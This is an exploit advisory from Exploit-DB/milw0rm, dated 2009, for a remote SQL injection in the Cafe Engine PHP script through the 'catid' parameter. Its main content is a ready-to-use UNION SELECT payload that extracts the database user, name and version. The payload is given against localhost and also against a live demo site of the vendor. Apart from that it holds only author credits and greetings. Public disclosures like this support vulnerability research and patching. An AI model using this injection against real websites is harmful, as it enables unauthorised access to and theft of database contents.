CafeEngine - 'catid' SQL Injection

EDB-ID:

8002




Platform:

PHP

Date:

2009-02-06


           
             /************************************************************************/
             /*                                                                      */
             /*                            CAFE ENGINE                               */
             /*                                                                      */
             /*                   Remote SQL Injection Vulnerability                 */
             /*                                                                      */
             /*                                                                      */
             /************************************************************************/
   
                                                                                 


 [~]AUTHOR          : SuNHouSe2 [ALGERIAN HaCkEr]

 [~]HOME            : http://www.snakespc.com                    

 [~]VERSION         : EASY CAFE ENGINE

 [~]BUY SCRIPT      : http://cafeengine.com/  >>> Price : 10$

 [~]EXPLOIT         : 

                     http://127.0.0.1/index.php?catid=4%20UNION%20ALL%20SELECT%201,2,3,Group_concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--
                     
 [~]DEMO WEBSITE    :
                     http://easy.cafeengine.com/index.php?catid=4%20UNION%20ALL%20SELECT%201,2,3,Group_concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--
                

                             /////////////////////////////////////////////////////////////////////////////////////
            
                            ////////        Special ThanX : His0k4,& ALL Snakespc.com Members       ////////////
                           ////////             :Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:
                          ////////     ::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::    ////////////
                            
                         ////////////////////////////////////////////////////////////////////////////////////
                                        

                                               -=-=-=-= SuNHouSe2@yahoo.com =-=-=-

# milw0rm.com [2009-02-06]